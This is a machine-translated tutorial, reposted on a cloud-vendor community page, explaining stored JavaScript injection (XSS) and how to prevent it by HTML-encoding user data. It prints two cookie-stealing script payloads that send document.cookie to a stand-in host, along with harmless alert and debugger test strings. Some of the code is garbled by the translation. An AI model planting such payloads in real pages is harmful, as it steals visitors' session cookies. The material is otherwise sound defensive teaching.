The principle and precaution of JavaScript Injection Vulnerability (detailed) _javascript skills

Source: Internet
Author: User
Tags html encode advantage

Initial Contact:

After the initial exposure to JavaScript injection vulnerabilities, if you do not carefully analyze the mechanism of this vulnerability and extract a pattern of its occurrence, you will not be able to quickly discover all the possible injection risks in your project and guard against it in your code.

Mode of occurrence:

JavaScript injection vulnerabilities can occur primarily by relying on two key actions, one for users to be able to inject JavaScript into the system's memory or back-end storage systems from the interface, and the other is that there are some UI in the system that will show the user's injected data.

For example, the most common occurrence of injection vulnerabilities is in various types of names, such as the names of people in the system, and so on, because the name is often displayed on a variety of systems, if the user entered the name of the injection of the script, then the impact of each system has a risk of injection vulnerabilities.

When I was working on a bug bash for another project, I injected a JavaScript script into one of the names in the system, resulting in problems with the 8 subsystems, sites, and apps that used the name.

Solution:

There are two main ways to prevent injection vulnerabilities: One is to save the content after the user enters the data and then to the persistent storage, and the other is to encode the data from the persistent storage where the user enters the data encode.

The advantage of method one is that the code that stores the user's input data is usually small and fixed, but the UI interface that shows the input data may be many and may be changed, so it is better to guard against it; But the disadvantage is that the data stored in persistent storage is encode.

The advantage of method two is the raw content of the data stored in persistent storage, but the downside is the need to write code prevention in multiple UI interfaces, and to ensure that the new UI is added without forgetting to guard against it. For example, now the Web app is more popular, the company decided to develop, then in the development process must be done to prevent, otherwise may be other places are good, but the new system is not ready to prevent, the loophole finally occurred.

JavaScript Html Encode/decode by JQuery:

function HtmlEncode (value) {return

$ (' <div/> '). Text (value). html ();

}

function HtmlDecode (value) {return

$ (' <div/> '). HTML (value). text ();

}

The vulnerability is injected when the attack is used:

jquery Scenario:

<script>var i=$ ("</img>"); I.attr ("src", "http://hacksite?k=" +document.cookie); $ (' body '). Append (i) </script>

Native JS scene:

<script>var d=document;var i=d.createelement ("img"); I.setattribute ("src", "http://hacksite?k=" +d.cookie); D.body.appendchild (i) </script>

To inject content when testing a vulnerability:

<script>alert (0) </script>

<script>debugger</script>--assists developers in quickly locating error-prone JavaScript code (in the case of the debugger).

Above this JavaScript injection loophole principle and prevention (detailed) is small series to share all the content, hope to give everyone a reference, also hope that we support cloud habitat community.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.